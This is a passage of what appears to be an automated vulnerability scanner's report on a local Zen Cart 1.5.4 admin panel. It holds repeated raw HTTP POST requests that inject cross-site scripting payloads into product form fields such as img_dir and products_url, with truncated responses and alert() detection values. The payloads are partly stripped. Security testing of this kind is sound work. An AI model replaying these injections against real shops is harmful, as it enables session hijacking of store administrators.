-----------------------------28667138731706 Content-Disposition: form-data; name="master_category" 1 -----------------------------28667138731706 Content-Disposition: form-data; name="master_categories_id" 1 -----------------------------28667138731706 Content-Disposition: form-data; name="products_discount_type" 0 -----------------------------28667138731706 Content-Disposition: form-data; name="products_discount_type_from" 0 -----------------------------28667138731706 Content-Disposition: form-data; name="products_price_sorter" 12.0000 -----------------------------28667138731706 Content-Disposition: form-data; name="products_status" 0 -----------------------------28667138731706 Content-Disposition: form-data; name="products_date_available" 08/25/2015 -----------------------------28667138731706 Content-Disposition: form-data; name="manufacturers_id" 1 -----------------------------28667138731706 Content-Disposition: form-data; name="products_name[2]" admin -----------------------------28667138731706 Content-Disposition: form-data; name="products_name[1]" admin -----------------------------28667138731706 Content-Disposition: form-data; name="product_is_free" 0 -----------------------------28667138731706 Content-Disposition: form-data; name="product_is_call" 0 -----------------------------28667138731706 Content-Disposition: form-data; name="products_priced_by_attribute" 0 -----------------------------28667138731706 Content-Disposition: form-data; name="products_tax_class_id" 1 -----------------------------28667138731706 Content-Disposition: form-data; name="products_price" 12 -----------------------------28667138731706 Content-Disposition: form-data; name="products_price_gross" 12 -----------------------------28667138731706 Content-Disposition: form-data; name="products_virtual" 0 -----------------------------28667138731706 Content-Disposition: form-data; name="product_is_always_free_shipping" 2 -----------------------------28667138731706 Content-Disposition: form-data; name="products_qty_box_status" 1 -----------------------------28667138731706 Content-Disposition: form-data; name="products_quantity_order_min" 12 -----------------------------28667138731706 Content-Disposition: form-data; name="products_quantity_order_max" 12 -----------------------------28667138731706 Content-Disposition: form-data; name="products_quantity_order_units" 12 -----------------------------28667138731706 Content-Disposition: form-data; name="products_quantity_mixed" 1 -----------------------------28667138731706 Content-Disposition: form-data; name="products_description[2]" Default text -----------------------------28667138731706 Content-Disposition: form-data; name="products_description[1]" test -----------------------------28667138731706 Content-Disposition: form-data; name="products_quantity" 1222111 -----------------------------28667138731706 Content-Disposition: form-data; name="products_model" testval -----------------------------28667138731706 Content-Disposition: form-data; name="products_image"; filename="" Content-Type: application/octet-stream -----------------------------28667138731706 Content-Disposition: form-data; name="products_previous_image" 3ds/25 -----------------------------28667138731706 Content-Disposition: form-data; name="img_dir" >"> -----------------------------28667138731706 Content-Disposition: form-data; name="image_delete" 0 -----------------------------28667138731706 Content-Disposition: form-data; name="overwrite" 1 -----------------------------28667138731706 Content-Disposition: form-data; name="products_image_manual" 25 -----------------------------28667138731706 Content-Disposition: form-data; name="products_url[2]" http://www.kelev.biz -----------------------------28667138731706 Content-Disposition: form-data; name="products_url[1]" http://www.kelev.biz -----------------------------28667138731706 Content-Disposition: form-data; name="products_weight" 0 -----------------------------28667138731706 Content-Disposition: form-data; name="products_sort_order" 0 -----------------------------28667138731706 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:43:21 -----------------------------28667138731706 Content-Disposition: form-data; name="search" test -----------------------------28667138731706-- HTTP Response ----Truncated due to large size --- Manager
  • Media Types
  • admin admin $12.00
    25" border="0" alt=">">25" title=" >">25 " width="100" height="80" align="right" hspace="5" vspace="5">Default text
    For more information, please visit this products webpage.
    This product was added to our catalog on Tuesday 25 August, 2015.
    "> Detection value: alert(14405309.41877) HTTP Request POST /zen-cart/admin1/product.php?cPath=1&product_type=1&pID=2&action=new_product_preview&search=test HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: Connection: keep-alive Referer: http://localhost:8081/zen-cart/admin1/product.php?cPath=1&product_type=1&pID=2&action=new_product&search=test Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4 Content-Type: multipart/form-data; boundary=---------------------------28667138731706 Content-Length: 4988 -----------------------------28667138731706 Content-Disposition: form-data; name="securityToken" 9adbdf7813e8bda76f1aa498b0b5f4ea -----------------------------28667138731706 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:43:21 -----------------------------28667138731706 Content-Disposition: form-data; name="x" 0 -----------------------------28667138731706 Content-Disposition: form-data; name="y" 0 -----------------------------28667138731706 Content-Disposition: form-data; name="master_category" 1 -----------------------------28667138731706 Content-Disposition: form-data; name="master_categories_id" 1 -----------------------------28667138731706 Content-Disposition: form-data; name="products_discount_type" 0 -----------------------------28667138731706 Content-Disposition: form-data; name="products_discount_type_from" 0 -----------------------------28667138731706 Content-Disposition: form-data; name="products_price_sorter" 12.0000 -----------------------------28667138731706 Content-Disposition: form-data; name="products_status" 0 -----------------------------28667138731706 Content-Disposition: form-data; name="products_date_available" 08/25/2015 -----------------------------28667138731706 Content-Disposition: form-data; name="manufacturers_id" 1 -----------------------------28667138731706 Content-Disposition: form-data; name="products_name[2]" admin -----------------------------28667138731706 Content-Disposition: form-data; name="products_name[1]" admin -----------------------------28667138731706 Content-Disposition: form-data; name="product_is_free" 0 -----------------------------28667138731706 Content-Disposition: form-data; name="product_is_call" 0 -----------------------------28667138731706 Content-Disposition: form-data; name="products_priced_by_attribute" 0 -----------------------------28667138731706 Content-Disposition: form-data; name="products_tax_class_id" 1 -----------------------------28667138731706 Content-Disposition: form-data; name="products_price" 12 -----------------------------28667138731706 Content-Disposition: form-data; name="products_price_gross" 12 -----------------------------28667138731706 Content-Disposition: form-data; name="products_virtual" 0 -----------------------------28667138731706 Content-Disposition: form-data; name="product_is_always_free_shipping" 2 -----------------------------28667138731706 Content-Disposition: form-data; name="products_qty_box_status" 1 -----------------------------28667138731706 Content-Disposition: form-data; name="products_quantity_order_min" 12 -----------------------------28667138731706 Content-Disposition: form-data; name="products_quantity_order_max" 12 -----------------------------28667138731706 Content-Disposition: form-data; name="products_quantity_order_units" 12 -----------------------------28667138731706 Content-Disposition: form-data; name="products_quantity_mixed" 1 -----------------------------28667138731706 Content-Disposition: form-data; name="products_description[2]" Default text -----------------------------28667138731706 Content-Disposition: form-data; name="products_description[1]" test -----------------------------28667138731706 Content-Disposition: form-data; name="products_quantity" 1222111 -----------------------------28667138731706 Content-Disposition: form-data; name="products_model" testval -----------------------------28667138731706 Content-Disposition: form-data; name="products_image"; filename="" Content-Type: application/octet-stream -----------------------------28667138731706 Content-Disposition: form-data; name="products_previous_image" 3ds/25 -----------------------------28667138731706 Content-Disposition: form-data; name="img_dir" 3ds/ -----------------------------28667138731706 Content-Disposition: form-data; name="image_delete" 0 -----------------------------28667138731706 Content-Disposition: form-data; name="overwrite" 1 -----------------------------28667138731706 Content-Disposition: form-data; name="products_image_manual" >"> -----------------------------28667138731706 Content-Disposition: form-data; name="products_url[2]" http://www.kelev.biz -----------------------------28667138731706 Content-Disposition: form-data; name="products_url[1]" http://www.kelev.biz -----------------------------28667138731706 Content-Disposition: form-data; name="products_weight" 0 -----------------------------28667138731706 Content-Disposition: form-data; name="products_sort_order" 0 -----------------------------28667138731706 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:43:21 -----------------------------28667138731706 Content-Disposition: form-data; name="search" test -----------------------------28667138731706-- HTTP Response ----Truncated due to large size --- ger
  • Media Types
  • admin admin $12.00
    " border="0" alt="3ds/>">" title=" 3ds/>"> " width="100" height="80" align="right" hspace="5" vspace="5">Default text
    For more information, please visit this products webpage.
    This product was added to our catalog on Tuesday 25 August, 2015.
    "> Detection value: alert(14405309.42107) HTTP Request POST /zen-cart/admin1/product.php?cPath=1&product_type=1&pID=2&action=new_product_preview&search=test HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: Connection: keep-alive Referer: http://localhost:8081/zen-cart/admin1/product.php?cPath=1&product_type=1&pID=2&action=new_product&search=test Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4 Content-Type: multipart/form-data; boundary=---------------------------28667138731706 Content-Length: 4970 -----------------------------28667138731706 Content-Disposition: form-data; name="securityToken" 9adbdf7813e8bda76f1aa498b0b5f4ea -----------------------------28667138731706 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:43:21 -----------------------------28667138731706 Content-Disposition: form-data; name="x" 0 -----------------------------28667138731706 Content-Disposition: form-data; name="y" 0 -----------------------------28667138731706 Content-Disposition: form-data; name="master_category" 1 -----------------------------28667138731706 Content-Disposition: form-data; name="master_categories_id" 1 -----------------------------28667138731706 Content-Disposition: form-data; name="products_discount_type" 0 -----------------------------28667138731706 Content-Disposition: form-data; name="products_discount_type_from" 0 -----------------------------28667138731706 Content-Disposition: form-data; name="products_price_sorter" 12.0000 -----------------------------28667138731706 Content-Disposition: form-data; name="products_status" 0 -----------------------------28667138731706 Content-Disposition: form-data; name="products_date_available" 08/25/2015 -----------------------------28667138731706 Content-Disposition: form-data; name="manufacturers_id" 1 -----------------------------28667138731706 Content-Disposition: form-data; name="products_name[2]" admin -----------------------------28667138731706 Content-Disposition: form-data; name="products_name[1]" admin -----------------------------28667138731706 Content-Disposition: form-data; name="product_is_free" 0 -----------------------------28667138731706 Content-Disposition: form-data; name="product_is_call" 0 -----------------------------28667138731706 Content-Disposition: form-data; name="products_priced_by_attribute" 0 -----------------------------28667138731706 Content-Disposition: form-data; name="products_tax_class_id" 1 -----------------------------28667138731706 Content-Disposition: form-data; name="products_price" 12 -----------------------------28667138731706 Content-Disposition: form-data; name="products_price_gross" 12 -----------------------------28667138731706 Content-Disposition: form-data; name="products_virtual" 0 -----------------------------28667138731706 Content-Disposition: form-data; name="product_is_always_free_shipping" 2 -----------------------------28667138731706 Content-Disposition: form-data; name="products_qty_box_status" 1 -----------------------------28667138731706 Content-Disposition: form-data; name="products_quantity_order_min" 12 -----------------------------28667138731706 Content-Disposition: form-data; name="products_quantity_order_max" 12 -----------------------------28667138731706 Content-Disposition: form-data; name="products_quantity_order_units" 12 -----------------------------28667138731706 Content-Disposition: form-data; name="products_quantity_mixed" 1 -----------------------------28667138731706 Content-Disposition: form-data; name="products_description[2]" Default text -----------------------------28667138731706 Content-Disposition: form-data; name="products_description[1]" test -----------------------------28667138731706 Content-Disposition: form-data; name="products_quantity" 1222111 -----------------------------28667138731706 Content-Disposition: form-data; name="products_model" testval -----------------------------28667138731706 Content-Disposition: form-data; name="products_image"; filename="" Content-Type: application/octet-stream -----------------------------28667138731706 Content-Disposition: form-data; name="products_previous_image" 3ds/25 -----------------------------28667138731706 Content-Disposition: form-data; name="img_dir" 3ds/ -----------------------------28667138731706 Content-Disposition: form-data; name="image_delete" 0 -----------------------------28667138731706 Content-Disposition: form-data; name="overwrite" 1 -----------------------------28667138731706 Content-Disposition: form-data; name="products_image_manual" 25 -----------------------------28667138731706 Content-Disposition: form-data; name="products_url[2]" >"> -----------------------------28667138731706 Content-Disposition: form-data; name="products_url[1]" http://www.kelev.biz -----------------------------28667138731706 Content-Disposition: form-data; name="products_weight" 0 -----------------------------28667138731706 Content-Disposition: form-data; name="products_sort_order" 0 -----------------------------28667138731706 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:43:21 -----------------------------28667138731706 Content-Disposition: form-data; name="search" test -----------------------------28667138731706-- HTTP Response ----Truncated due to large size --- h="100%" cellspacing="0" cellpadding="2">
    admin admin $12.00
    3ds/25Default text
    For more information, please visit this products " target="blank">webpage.
    This product was added to our catalog on Tuesday 25 August, 2015.
    Finding 3.20: Cross-Site Scripting. This is a reflected XSS vulnerability, detected in an alert that was an immediate response to the injection. Injected item: POST: products_url[1] Injection value: >"> Detection value: alert(14405309.42117) HTTP Request POST /zen-cart/admin1/product.php?cPath=1&product_type=1&pID=2&action=new_product_preview&search=test HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: Connection: keep-alive Referer: http://localhost:8081/zen-cart/admin1/product.php?cPath=1&product_type=1&pID=2&action=new_product&search=test Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4 Content-Type: multipart/form-data; boundary=---------------------------28667138731706 Content-Length: 4970 -----------------------------28667138731706 Content-Disposition: form-data; name="securityToken" 9adbdf7813e8bda76f1aa498b0b5f4ea -----------------------------28667138731706 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:43:21 -----------------------------28667138731706 Content-Disposition: form-data; name="x" 0 -----------------------------28667138731706 Content-Disposition: form-data; name="y" 0 -----------------------------28667138731706 Content-Disposition: form-data; name="master_category" 1 -----------------------------28667138731706 Content-Disposition: form-data; name="master_categories_id" 1 -----------------------------28667138731706 Content-Disposition: form-data; name="products_discount_type" 0 -----------------------------28667138731706 Content-Disposition: form-data; name="products_discount_type_from" 0 -----------------------------28667138731706 Content-Disposition: form-data; name="products_price_sorter" 12.0000 -----------------------------28667138731706 Content-Disposition: form-data; name="products_status" 0 -----------------------------28667138731706 Content-Disposition: form-data; name="products_date_available" 08/25/2015 -----------------------------28667138731706 Content-Disposition: form-data; name="manufacturers_id" 1 -----------------------------28667138731706 Content-Disposition: form-data; name="products_name[2]" admin -----------------------------28667138731706 Content-Disposition: form-data; name="products_name[1]" admin -----------------------------28667138731706 Content-Disposition: form-data; name="product_is_free" 0 -----------------------------28667138731706 Content-Disposition: form-data; name="product_is_call" 0 -----------------------------28667138731706 Content-Disposition: form-data; name="products_priced_by_attribute" 0 -----------------------------28667138731706 Content-Disposition: form-data; name="products_tax_class_id" 1 -----------------------------28667138731706 Content-Disposition: form-data; name="products_price" 12 -----------------------------28667138731706 Content-Disposition: form-data; name="products_price_gross" 12 -----------------------------28667138731706 Content-Disposition: form-data; name="products_virtual" 0 -----------------------------28667138731706 Content-Disposition: form-data; name="product_is_always_free_shipping" 2 -----------------------------28667138731706 Content-Disposition: form-data; name="products_qty_box_status" 1 -----------------------------28667138731706 Content-Disposition: form-data; name="products_quantity_order_min" 12 -----------------------------28667138731706 Content-Disposition: form-data; name="products_quantity_order_max" 12 -----------------------------28667138731706 Content-Disposition: form-data; name="products_quantity_order_units" 12 -----------------------------28667138731706 Content-Disposition: form-data; name="products_quantity_mixed" 1 -----------------------------28667138731706 Content-Disposition: form-data; name="products_description[2]" Default text -----------------------------28667138731706 Content-Disposition: form-data; name="products_description[1]" test -----------------------------28667138731706 Content-Disposition: form-data; name="products_quantity" 1222111 -----------------------------28667138731706 Content-Disposition: form-data; name="products_model" testval -----------------------------28667138731706 Content-Disposition: form-data; name="products_image"; filename="" Content-Type: application/octet-stream -----------------------------28667138731706 Content-Disposition: form-data; name="products_previous_image" 3ds/25 -----------------------------28667138731706 Content-Disposition: form-data; name="img_dir" 3ds/ -----------------------------28667138731706 Content-Disposition: form-data; name="image_delete" 0 -----------------------------28667138731706 Content-Disposition: form-data; name="overwrite" 1 -----------------------------28667138731706 Content-Disposition: form-data; name="products_image_manual" 25 -----------------------------28667138731706 Content-Disposition: form-data; name="products_url[2]" http://www.kelev.biz -----------------------------28667138731706 Content-Disposition: form-data; name="products_url[1]" >"> -----------------------------28667138731706 Content-Disposition: form-data; name="products_weight" 0 -----------------------------28667138731706 Content-Disposition: form-data; name="products_sort_order" 0 -----------------------------28667138731706 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:43:21 -----------------------------28667138731706 Content-Disposition: form-data; name="search" test -----------------------------28667138731706-- HTTP Response ----Truncated due to large size --- "100%" cellspacing="0" cellpadding="2">
    English admin $12.00
    English admin $12.00
    3ds/25test
    For more information, please visit this products " target="blank">webpage.
    This product was added to our catalog on Tuesday 25 August, 2015.
        Cancel
    Zen Cart:: the art of e-commerce

    E-Commerce Engine Copyright © 2003-2015 Zen Cart®
    Zen Cart v1.5.4/v1.5.4

    Finding 3.22: Cross-Site Scripting. This is a reflected XSS vulnerability, detected in an alert that was an immediate response to the injection. Injected item: POST: products_description[2] Injection value: Detection value: HTTP Request POST /zen-cart/admin1/product.php?cPath=1&product_type=1&pID=1&action=new_product_preview&page=1&search=test HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: Connection: keep-alive Referer: http://localhost:8081/zen-cart/admin1/product.php?page=1&product_type=1&cPath=1&pID=1&action=new_product&search=test Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4 Content-Type: multipart/form-data; boundary=---------------------------244472214220682 Content-Length: 5019 -----------------------------244472214220682 Content-Disposition: form-data; name="securityToken" 9adbdf7813e8bda76f1aa498b0b5f4ea -----------------------------244472214220682 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:42:30 -----------------------------244472214220682 Content-Disposition: form-data; name="x" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="y" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="master_category" 1 -----------------------------244472214220682 Content-Disposition: form-data; name="master_categories_id" 1 -----------------------------244472214220682 Content-Disposition: form-data; name="products_discount_type" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="products_discount_type_from" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="products_price_sorter" 12.0000 -----------------------------244472214220682 Content-Disposition: form-data; name="products_status" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="products_date_available" 08/25/2015 -----------------------------244472214220682 Content-Disposition: form-data; name="manufacturers_id" 1 -----------------------------244472214220682 Content-Disposition: form-data; name="products_name[2]" admin -----------------------------244472214220682 Content-Disposition: form-data; name="products_name[1]" admin -----------------------------244472214220682 Content-Disposition: form-data; name="product_is_free" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="product_is_call" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="products_priced_by_attribute" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="products_tax_class_id" 1 -----------------------------244472214220682 Content-Disposition: form-data; name="products_price" 12 -----------------------------244472214220682 Content-Disposition: form-data; name="products_price_gross" 12 -----------------------------244472214220682 Content-Disposition: form-data; name="products_virtual" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="product_is_always_free_shipping" 2 -----------------------------244472214220682 Content-Disposition: form-data; name="products_qty_box_status" 1 -----------------------------244472214220682 Content-Disposition: form-data; name="products_quantity_order_min" 12 -----------------------------244472214220682 Content-Disposition: form-data; name="products_quantity_order_max" 12 -----------------------------244472214220682 Content-Disposition: form-data; name="products_quantity_order_units" 12 -----------------------------244472214220682 Content-Disposition: form-data; name="products_quantity_mixed" 1 -----------------------------244472214220682 Content-Disposition: form-data; name="products_description[2]" -----------------------------244472214220682 Content-Disposition: form-data; name="products_description[1]" test -----------------------------244472214220682 Content-Disposition: form-data; name="products_quantity" 1222111 -----------------------------244472214220682 Content-Disposition: form-data; name="products_model" testval -----------------------------244472214220682 Content-Disposition: form-data; name="products_image"; filename="" Content-Type: application/octet-stream -----------------------------244472214220682 Content-Disposition: form-data; name="products_previous_image" 3ds/25 -----------------------------244472214220682 Content-Disposition: form-data; name="img_dir" 3ds/ -----------------------------244472214220682 Content-Disposition: form-data; name="image_delete" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="overwrite" 1 -----------------------------244472214220682 Content-Disposition: form-data; name="products_image_manual" 25 -----------------------------244472214220682 Content-Disposition: form-data; name="products_url[2]" http://www.kelev.biz -----------------------------244472214220682 Content-Disposition: form-data; name="products_url[1]" http://www.kelev.biz -----------------------------244472214220682 Content-Disposition: form-data; name="products_weight" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="products_sort_order" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:42:30 -----------------------------244472214220682 Content-Disposition: form-data; name="search" test -----------------------------244472214220682-- HTTP Response ----Truncated due to large size --- pes
    admin admin $12.00
    3ds/25
    For more information, please visit this products webpage.
    This product was added to our catalog on Tuesday 25 August, 2015.
    Englishalert(14405309.56887) Detection value: HTTP Request POST /zen-cart/admin1/product.php?cPath=1&product_type=1&pID=1&action=new_product_preview&page=1&search=test HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: Connection: keep-alive Referer: http://localhost:8081/zen-cart/admin1/product.php?page=1&product_type=1&cPath=1&pID=1&action=new_product&search=test Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4 Content-Type: multipart/form-data; boundary=---------------------------244472214220682 Content-Length: 5027 -----------------------------244472214220682 Content-Disposition: form-data; name="securityToken" 9adbdf7813e8bda76f1aa498b0b5f4ea -----------------------------244472214220682 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:42:30 -----------------------------244472214220682 Content-Disposition: form-data; name="x" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="y" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="master_category" 1 -----------------------------244472214220682 Content-Disposition: form-data; name="master_categories_id" 1 -----------------------------244472214220682 Content-Disposition: form-data; name="products_discount_type" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="products_discount_type_from" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="products_price_sorter" 12.0000 -----------------------------244472214220682 Content-Disposition: form-data; name="products_status" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="products_date_available" 08/25/2015 -----------------------------244472214220682 Content-Disposition: form-data; name="manufacturers_id" 1 -----------------------------244472214220682 Content-Disposition: form-data; name="products_name[2]" admin -----------------------------244472214220682 Content-Disposition: form-data; name="products_name[1]" admin -----------------------------244472214220682 Content-Disposition: form-data; name="product_is_free" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="product_is_call" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="products_priced_by_attribute" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="products_tax_class_id" 1 -----------------------------244472214220682 Content-Disposition: form-data; name="products_price" 12 -----------------------------244472214220682 Content-Disposition: form-data; name="products_price_gross" 12 -----------------------------244472214220682 Content-Disposition: form-data; name="products_virtual" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="product_is_always_free_shipping" 2 -----------------------------244472214220682 Content-Disposition: form-data; name="products_qty_box_status" 1 -----------------------------244472214220682 Content-Disposition: form-data; name="products_quantity_order_min" 12 -----------------------------244472214220682 Content-Disposition: form-data; name="products_quantity_order_max" 12 -----------------------------244472214220682 Content-Disposition: form-data; name="products_quantity_order_units" 12 -----------------------------244472214220682 Content-Disposition: form-data; name="products_quantity_mixed" 1 -----------------------------244472214220682 Content-Disposition: form-data; name="products_description[2]" Default text -----------------------------244472214220682 Content-Disposition: form-data; name="products_description[1]" -----------------------------244472214220682 Content-Disposition: form-data; name="products_quantity" 1222111 -----------------------------244472214220682 Content-Disposition: form-data; name="products_model" testval -----------------------------244472214220682 Content-Disposition: form-data; name="products_image"; filename="" Content-Type: application/octet-stream -----------------------------244472214220682 Content-Disposition: form-data; name="products_previous_image" 3ds/25 -----------------------------244472214220682 Content-Disposition: form-data; name="img_dir" 3ds/ -----------------------------244472214220682 Content-Disposition: form-data; name="image_delete" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="overwrite" 1 -----------------------------244472214220682 Content-Disposition: form-data; name="products_image_manual" 25 -----------------------------244472214220682 Content-Disposition: form-data; name="products_url[2]" http://www.kelev.biz -----------------------------244472214220682 Content-Disposition: form-data; name="products_url[1]" http://www.kelev.biz -----------------------------244472214220682 Content-Disposition: form-data; name="products_weight" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="products_sort_order" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:42:30 -----------------------------244472214220682 Content-Disposition: form-data; name="search" test -----------------------------244472214220682-- HTTP Response ----Truncated due to large size --- " class="smallText">This product was added to our catalog on Tuesday 25 August, 2015.
    English admin $12.00
    3ds/25
    For more information, please visit this products webpage.
    This product was added to our catalog on Tuesday 25 August, 2015.
    Detection value: alert(14405309.57257) HTTP Request POST /zen-cart/admin1/product.php?cPath=1&product_type=1&pID=1&action=new_product_preview&page=1&search=test HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: Connection: keep-alive Referer: http://localhost:8081/zen-cart/admin1/product.php?page=1&product_type=1&cPath=1&pID=1&action=new_product&search=test Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4 Content-Type: multipart/form-data; boundary=---------------------------244472214220682 Content-Length: 5030 -----------------------------244472214220682 Content-Disposition: form-data; name="securityToken" 9adbdf7813e8bda76f1aa498b0b5f4ea -----------------------------244472214220682 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:42:30 -----------------------------244472214220682 Content-Disposition: form-data; name="x" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="y" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="master_category" 1 -----------------------------244472214220682 Content-Disposition: form-data; name="master_categories_id" 1 -----------------------------244472214220682 Content-Disposition: form-data; name="products_discount_type" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="products_discount_type_from" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="products_price_sorter" 12.0000 -----------------------------244472214220682 Content-Disposition: form-data; name="products_status" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="products_date_available" 08/25/2015 -----------------------------244472214220682 Content-Disposition: form-data; name="manufacturers_id" 1 -----------------------------244472214220682 Content-Disposition: form-data; name="products_name[2]" admin -----------------------------244472214220682 Content-Disposition: form-data; name="products_name[1]" admin -----------------------------244472214220682 Content-Disposition: form-data; name="product_is_free" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="product_is_call" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="products_priced_by_attribute" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="products_tax_class_id" 1 -----------------------------244472214220682 Content-Disposition: form-data; name="products_price" 12 -----------------------------244472214220682 Content-Disposition: form-data; name="products_price_gross" 12 -----------------------------244472214220682 Content-Disposition: form-data; name="products_virtual" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="product_is_always_free_shipping" 2 -----------------------------244472214220682 Content-Disposition: form-data; name="products_qty_box_status" 1 -----------------------------244472214220682 Content-Disposition: form-data; name="products_quantity_order_min" 12 -----------------------------244472214220682 Content-Disposition: form-data; name="products_quantity_order_max" 12 -----------------------------244472214220682 Content-Disposition: form-data; name="products_quantity_order_units" 12 -----------------------------244472214220682 Content-Disposition: form-data; name="products_quantity_mixed" 1 -----------------------------244472214220682 Content-Disposition: form-data; name="products_description[2]" Default text -----------------------------244472214220682 Content-Disposition: form-data; name="products_description[1]" test -----------------------------244472214220682 Content-Disposition: form-data; name="products_quantity" 1222111 -----------------------------244472214220682 Content-Disposition: form-data; name="products_model" testval -----------------------------244472214220682 Content-Disposition: form-data; name="products_image"; filename="" Content-Type: application/octet-stream -----------------------------244472214220682 Content-Disposition: form-data; name="products_previous_image" 3ds/25 -----------------------------244472214220682 Content-Disposition: form-data; name="img_dir" >"> -----------------------------244472214220682 Content-Disposition: form-data; name="image_delete" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="overwrite" 1 -----------------------------244472214220682 Content-Disposition: form-data; name="products_image_manual" 25 -----------------------------244472214220682 Content-Disposition: form-data; name="products_url[2]" http://www.kelev.biz -----------------------------244472214220682 Content-Disposition: form-data; name="products_url[1]" http://www.kelev.biz -----------------------------244472214220682 Content-Disposition: form-data; name="products_weight" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="products_sort_order" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:42:30 -----------------------------244472214220682 Content-Disposition: form-data; name="search" test -----------------------------244472214220682-- HTTP Response ----Truncated due to large size --- Manager
  • Media Types
  • admin admin $12.00
    25" border="0" alt=">">25" title=" >">25 " width="100" height="80" align="right" hspace="5" vspace="5">Default text
    For more information, please visit this products webpage.
    This product was added to our catalog on Tuesday 25 August, 2015.
    "> Detection value: alert(14405309.57377) HTTP Request POST /zen-cart/admin1/product.php?cPath=1&product_type=1&pID=1&action=new_product_preview&page=1&search=test HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: Connection: keep-alive Referer: http://localhost:8081/zen-cart/admin1/product.php?page=1&product_type=1&cPath=1&pID=1&action=new_product&search=test Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4 Content-Type: multipart/form-data; boundary=---------------------------244472214220682 Content-Length: 5032 -----------------------------244472214220682 Content-Disposition: form-data; name="securityToken" 9adbdf7813e8bda76f1aa498b0b5f4ea -----------------------------244472214220682 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:42:30 -----------------------------244472214220682 Content-Disposition: form-data; name="x" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="y" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="master_category" 1 -----------------------------244472214220682 Content-Disposition: form-data; name="master_categories_id" 1 -----------------------------244472214220682 Content-Disposition: form-data; name="products_discount_type" 0 -----------------------------244472214220682 